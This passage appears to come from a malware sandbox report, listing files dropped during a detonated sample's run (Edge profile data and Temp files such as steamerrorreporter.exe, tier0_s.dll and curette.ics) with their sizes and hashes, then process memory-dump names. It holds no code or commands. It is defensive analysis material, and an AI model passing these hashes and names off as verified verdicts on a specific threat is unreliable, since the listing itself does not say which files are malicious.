2bf9282b87bdef746d298cff0734b9a82cd9c24656cb167b24a84c30fb6a1fd0

SHA512
484a1c99ee3c3d1ebf0af5ec9e73c9a2ca3cf8918f0ba2a4b543b75fa587ec6b432866b74bcd6b5cdd9372532c882da438d44653bd5bccdbc94ebc27852ff9e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5408de1548eb3231accfb9f086f2b9db

SHA1
f2d8c7e9f3e26cd49ee0a7a4fecd70b2bf2b7e8a

SHA256
3052d0885e0ef0d71562958b851db519cfed36fd8e667b57a65374ee1a13a670

SHA512
783254d067de3ac40df618665be7f76a6a8acb7e63b875bffc3c0c73b68d138c8a98c437e6267a1eb33f04be976a14b081a528598b1e517cdd9ad2293501acc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
29b5ca43dbcb37bf12830235ceb4a140

SHA1
57f59ee8a25be7d609c7486534cfb85ace62a75f

SHA256
cdc1034be24325676a202bf9144f317223ee8231d96488d84b1ffce69fa72c6d

SHA512
9fa5c43a580761947d43cff0558283963b23daa0c822e14de347d7931b188e8fb0fe842cb0e92f3e782f86c91ae48dd9c1da56f65bb981f4d3843478638699ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
816B

MD5
fc5ba70ac0eb18c884e79b2890719df8

SHA1
a762d0264a832b7cb271ac51d64059c81c82c5ea

SHA256
585836a23af021a760520ac7a8ac95a8c7873a8d5892255c26cf06aeab65efae

SHA512
0ece77229506aed2e1b4d1754a3b2dafb7d918dc566ed68a66f7f33a3bf88eca378a8bd0735597c0c6d766ea32777801670415ae34afdc2923c1055cf4f1d536

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
f67c1a1369f3e3e9814741fcd96460b5

SHA1
b5a4e2aedc0c203caa305e2e720890c2e81e4795

SHA256
0bfa693865eed70122c8bc5616113ece729824f1a7859aded7901ddb027644d1

SHA512
5d5e4a0cf0a499b253cc3341cb46ba80733f3f372eb89b3f5eafb9d3db507fd645ad99352ebdc48086f6019bdf11a9fe029e3081152fddba4ee2816d3b253e2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe58775e.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
b3b25529f59172130dcd900c0e83c5aa

SHA1
76e12c4997993ceddfaa7733d185e85341060234

SHA256
0f16af8a4334e4222153695cf5219143385b38d60176502f731e3f8ab8ba2046

SHA512
cf1b9c4ac3e79a127b0e63c91d7fd55ba0a906323c707be1dbe11575cc3224ce99a261f5d5dae19835da7c7e51c4459c68b17a73c53571ad17f708381da84cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a964c45328c17046a93b466dd9ab3304

SHA1
25ff67dff234d07ba98f285a4e68d3287b31ca4f

SHA256
f8d926b131baa40dfb23c2a28af55273516be4e357de3da4518baac72c6e755f

SHA512
6c48def45e573a3d00444e3daff831a07635180d0159a3053cdb5bc2109102e7e772bf1781b7d04e176e997965c0e6cf39d96795181adf9348233ce7e038f138

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c11953b95f68ac6135d7f0815e903624

SHA1
a6c55bab77b96a69747900bc8e7bca132f491dc8

SHA256
ffc32936c5a56d333eb54b5c3cb09f29a1c14292a6b2c32bb70964d65609ab26

SHA512
a2ca0998fbb60b073a1f7e2b7c63ebc8a4755b077ebcfdbc1046a7666c5fa20fd9dce8fcc8601911cb48d758a02b1401990cd1c24f249700418c3d509dd6530b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
7ad0042fc2fa41e838fa54cc16bc14b5

SHA1
6b24a629636ce591b2e3446d39f872e1ff076943

SHA256
8f22012fcd47f57e3b5d5e5191451fc284fb5af17c6bfb18fdd4489b713af3aa

SHA512
08aff4521a5e292df797c26587629a019a9099b8b7570de5c44e47287c5059f9549665b1db078c2e7a07083ff3173723f461da61c6d72a60ff35884541b609e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
48febe0b0625901956573dfb2378e7ed

SHA1
c324173a8f8fd7a6a7398f6bb24dd2ee11d3cf24

SHA256
f0fae7ad33efdd05845d0d631ce8341ea4b6dfd4c45be844f0c117738df9c0d0

SHA512
fc38a0c64e67e3b5d43f787fe86f700e6f753d8e90bcebc446d4a8c631b9e4362a74fa862a5b2ffc74f3f5236d3ecf006b341042b5469d1cc24f2c325a607a91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
bc3a0ca62cfef580ff9ebbb7afc92b9b

SHA1
fde9832ce521fcd53850d0701a543ef75b772e3b

SHA256
b0203fb7c3812937e92ac04ad6065a2129bc165a36a60a4d2fdb0accc4499464

SHA512
fc1f3a5bd2106d9b6ed5a678c2f4978550a0d7414172b0ce6954a835b0da01ac28c177955a48c2ef56ea3d517a6672474a9cab873aeccae3f22a45ccf2d070de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
aab436e23d13134d11b4ef413fdbebfb

SHA1
a16881ce8244249e45644e8b9d5149d5905d538d

SHA256
37e3f4518429b19e0bcf76e7c3180a218a7353dd0e947bf4cd0b862219bfb8ce

SHA512
614efba742082ad1c018946c9f0ec7cd6d4ca2c3d23201522b82bcd8221ee8d3e1e4ff85d38ab5d127a3a2bf8eeae6e639b07c8fe2fa2c390dfe60b16e364384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
96201e55127acf5bc5c951d41baa5e4f

SHA1
442370cd04191e00e1fb52b2e84d1094da0461a0

SHA256
697a2e509b02d65e9b119a456c98fbe76f07cbf3101e92126f36387b6aa36c69

SHA512
2025899b9d41d781fa8c97268e47000bde18f2e0f7329af4c642f89283cc1457a2d8fde9126c29e50cdbd544193bda5f0bf3667409fdd65110b94d2b3650a8be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f0ffeec1a23d5353336834035d9941ef

SHA1
a9e9616ea556627dc402225ed3325a328e7987a8

SHA256
5419a5bc64f5bfce384629383ff9dab8dc03413633630e8cc785ed87a4eb66f8

SHA512
edf9a36fca5c8f562196ce597a2160001256764072046e376a89b05a44095d0d7aa11fac657d130e48fc90c3399a776b7f392068d2a346064e5b07b838021338

Download Submit
C:\Users\Admin\AppData\Local\Temp\70199bd2

Filesize
1.0MB

MD5
64b2d0691dbcacd06fc4e67fdb66a854

SHA1
01dc20a026ea002cf0daf91c80343a1d3849f3b4

SHA256
aed316ab9087c2fd60945c8451bf7a7d0e826cc79d93c2d0ef3dd60ea738788b

SHA512
a2d570c45ec6ed5d8583afb9349ad2dafbdbbc5e68520a03df35319710da84bd305b6a6dec7defe56e838ca370923ecfd943e59e61ac54af35bb52081ede6985

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gr4hk23p.czk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aesc.mov

Filesize
38KB

MD5
ba1411d5b561b92adefa48aaca564e47

SHA1
05f4abb6396388f904efeb6ae4c647ee6e701483

SHA256
5091d9b372b2dd4550cf2b14be4372792509b5c606449e73d487213d6e7402bf

SHA512
437db6fbb612369be7423f6e8c6ab0ba543cc6d3dcc5fd33e5aa26808bf5abfbb5eec12f1af2b8c5b5aca5ba8560fe441eb43270e1acc740ba03e9ef52d36aa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\curette.ics

Filesize
783KB

MD5
b117d9e0270a6c06ea7a06d905e6c03e

SHA1
ca59e78905803706eb9f310ab80df2ab0be29cd9

SHA256
bcc4db20cb7fa0b9089d1b9dccc6125279629a358b7613365ad5cd53dfb0910a

SHA512
f5158226871453962f51525a437d71fe73862d8a63458bac8a0c5ab66139132c62efcdffb9eea42f933bcb763a4d49d4af3783f8cd1501219137ba7941ffc67e

Download Submit
C:\Users\Admin\AppData\Local\Temp\steamerrorreporter.exe

Filesize
560KB

MD5
dc1681b98049f1df46dd10d7f4c26045

SHA1
4c7f5cf7c00b6139979f8aa41f46979666369224

SHA256
594f9853124e0a81deeaaecb8ec3d192169e7393778214ef6d8f6460450ef080

SHA512
c9a2086326acbab8aba801da0d8bd2aa06951ec7fd7f32a3150f9521498c0b6711552695fbf9d0de7668503630c508bcd68e1d715796ef34f9945035da3fe1ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\tier0_s.dll

Filesize
341KB

MD5
884013332bf332e4dd8cbf0109a8cfeb

SHA1
c01789d661d465ca29d20174d8f5d29afb1fcffa

SHA256
8ed104f6d7a50f95d515005bf6bd5569cd2dc0107119aa3d91e21dd7ba777e98

SHA512
ea18f416b1295edcfc197c685d56030246097bf95ffffa46f13a16753d05d95a1adb83b5ba0669eaa1049856ea2486ca0fc49507df7d41572de80701e9852f64

Download Submit
C:\Users\Admin\AppData\Local\Temp\vstdlib_s.dll

Filesize
519KB

MD5
464b80302d3e5f1a12030f2afd15e8c0

SHA1
fa4a9d98b5272f3d1110188b53264b03134f1bcd

SHA256
954ecb7e90993cf1e3d426a00512f0591a0c385d986db7b923b872289a659ed9

SHA512
03686460522be3f830142c95b86dbaa686888a1fd22dc218ef6f0a6e1b7b1f8d65444b47d909c09348c6fa003d5f000998f640524aa001d719f4381c78e004d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
02bb2988d239257a885772083b3362d7

SHA1
74ba1c36e9ede52b5717a2d304f627ef509c5764

SHA256
8335ddde3ff0eece8e46cacd4f835c3b8d68fe506fd6038f0e65a7b08381a01a

SHA512
d649d9083bbc500f201d89ccf210aaef277a973283938c082cc01e001a35badd942ede1ff11fa93f675ca1110dfc5e45c593bae3044f700c679447f64c471d7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
5b92f7fb8cba37174f0539585e32cc88

SHA1
528c3bc800e73e5cb6ddf273c39080272d8044c5

SHA256
e1ff66199727f60ca3518c0bce915aeb8fb08058e0a8bed48858c4bc7d0ecd41

SHA512
256fc4857ba59d2110c82458f3c3a5a9fa6a09b200378b18cabc207d814364d063885abe45215328606dd51504196b54c0a649025936e41406241b73bbb18945

Download Submit
memory/400-384-0x0000000074F30000-0x00000000750AB000-memory.dmp

Filesize
1.5MB

Download
memory/400-352-0x00007FF9B9CB0000-0x00007FF9B9EA8000-memory.dmp

Filesize
2.0MB

Download
memory/400-351-0x0000000074F30000-0x00000000750AB000-memory.dmp

Filesize
1.5MB

Download
memory/1936-345-0x0000000074E00000-0x0000000074F7B000-memory.dmp

Filesize
1.5MB

Download
memory/1936-346-0x00007FF9B9CB0000-0x00007FF9B9EA8000-memory.dmp

Filesize
2.0MB

Download
memory/3404-362-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-355-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-361-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-360-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-359-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-353-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-363-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-364-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-365-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/3404-354-0x000001BD7F550000-0x000001BD7F551000-memory.dmp

Filesize
4KB

Download
memory/5092-396-0x00007FF9B9CB0000-0x00007FF9B9EA8000-memory.dmp

Filesize
2.0MB

Download
memory/5092-415-0x0000000074F30000-0x00000000750AB000-memory.dmp

Filesize
1.5MB

Download
memory/5108-338-0x000002455B2B0000-0x000002455B2FC000-memory.dmp

Filesize
304KB

Download
memory/5108-322-0x000002455B290000-0x000002455B29A000-memory.dmp

Filesize
40KB

Download
memory/5108-321-0x000002455B8C0000-0x000002455B8D2000-memory.dmp

Filesize
72KB

Download
memory/5108-310-0x0000024543120000-0x0000024543142000-memory.dmp

Filesize
136KB

Download
memory/5316-419-0x00007FF9B9CB0000-0x00007FF9B9EA8000-memory.dmp

Filesize
2.0MB

Download
memory/5316-420-0x00000000003F0000-0x0000000000448000-memory.dmp

Filesize
352KB

Download